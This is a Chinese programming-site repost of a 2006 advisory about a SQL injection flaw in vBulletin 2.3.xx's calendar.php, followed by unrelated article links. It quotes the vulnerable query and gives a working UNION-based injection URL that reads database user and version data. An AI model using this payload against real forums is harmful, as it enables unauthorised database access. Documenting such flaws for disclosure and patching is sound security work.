编程 PHP

vBulletin Forum 2.3.xx SQL Injection

Posted in PHP onOctober 09, 2006

vBulletin Forum 2.3.xx SQL Injection There exist a sql injection problem in calendar.php.

-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
$eventinfo = $DB_site->query_first("SELECT allowsmilies,public,userid,
eventdate,event,subject FROM calendar_events WHERE eventid = $eventid");
-----------------------------------------------------

If the MySQL version is greater than 4.00, a UNION attack could be used.

-----------------------------------------
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_ev
ents%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
-----------------------------------------

The query_first function will only return the first row of the query result, so make sure it returns !
the one you want.

vBulletin Forum 2.3.xx SQL Injection

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

随机头像PHP版

Oct 09 PHP

php获取url字符串截取路径的文件名和扩展名的函数

Jan 22 PHP

ThinkPHP结合ajax、Mysql实现的客户端通信功能代码示例

Jun 23 PHP

PHP把JPEG图片转换成Progressive JPEG的方法

Jun 30 PHP

PHP的pcntl多进程用法实例

Mar 19 PHP

PHP简单生成缩略图相册的方法

Jul 29 PHP

详细解读PHP中接口的应用

Aug 12 PHP

php对接java现实加签验签的实例

Nov 25 PHP

PHP简单计算两个时间差的方法示例

Jun 20 PHP

Laravel5.7框架安装与使用学习笔记图文详解

Apr 02 PHP

TP5框架请求响应参数实例分析

Oct 17 PHP

PHP设计模式（三）建造者模式Builder实例详解【创建型】

May 02 PHP

PHP_Flame(Version:Progress)的原代码

Oct 09 #PHP

图形数字验证代码

Oct 09 #PHP

用PHP函数解决SQL injection

Oct 09 #PHP

session 的生命周期是多长

Oct 09 #PHP

做个自己站内搜索引擎

Oct 09 #PHP

用libTemplate实现静态网页的生成

Oct 09 #PHP

php注入实例

Oct 09 #PHP

You might like

星际争霸秘籍

2020/03/04 星际争霸

如何通过View::first使用Laravel Blade的动态模板详解

2017/09/21 PHP

YII框架行为behaviors用法示例

2019/04/26 PHP

jQuery 相关控件的事件操作分解

2009/08/03 Javascript

js中style.display=""无效的解决方法

2014/10/30 Javascript

jQuery实现预加载图片的方法

2015/03/17 Javascript

JavaScript实现将数组中所有元素连接成一个字符串的方法

2015/04/06 Javascript

jquery滚动到顶部底部代码

2015/04/20 Javascript

Jquery组件easyUi实现表单验证示例

2016/08/23 Javascript

JQuery中解决重复动画的方法

2016/10/17 Javascript

RequireJS简易绘图程序开发

2016/10/28 Javascript

基于jquery实现的银行卡号每隔4位自动插入空格的实现代码

2016/11/22 Javascript

jQuery根据ID、CLASS、等获取对象的实例

2016/12/04 Javascript

Vue 应用中结合vux使用微信 jssdk的方法

2018/08/28 Javascript

ES6知识点整理之数组解构和字符串解构的应用示例

2019/04/17 Javascript

d3.js实现图形缩放平移

2019/12/19 Javascript

Openlayers学习之加载鹰眼控件

2020/09/28 Javascript

[11:01]2014DOTA2西雅图邀请赛冷冷带你探秘威斯汀

2014/07/08 DOTA

[02:34]DOTA2亚洲邀请赛 BG战队出场宣传片

2015/03/09 DOTA

python的random模块及加权随机算法的python实现方法

2017/01/04 Python

Python实现的多线程http压力测试代码

2017/02/08 Python

python3下实现搜狗AI API的代码示例

2018/04/10 Python

python os.listdir按文件存取时间顺序列出目录的实例

2018/10/21 Python

python使用writerows写csv文件产生多余空行的处理方法

2019/08/01 Python

Python argparse模块应用实例解析

2019/11/15 Python

Pytorch to(device)用法

2020/01/08 Python

Python基于百度AI实现OCR文字识别

2020/04/02 Python

Python基于requests实现模拟上传文件

2020/04/21 Python

贝玲妃英国官网：Benefit英国

2018/02/03 全球购物

铭立家具面试题

2012/12/06 面试题

师范生求职自荐信

2014/06/14 职场文书

竞选班干部演讲稿600字

2014/08/20 职场文书

2014大学生批评与自我批评思想汇报

2014/09/21 职场文书

离婚案件被告代理词

2015/05/23 职场文书

春节随笔

2015/08/15 职场文书

Python Pandas知识点之缺失值处理详解

2021/05/11 Python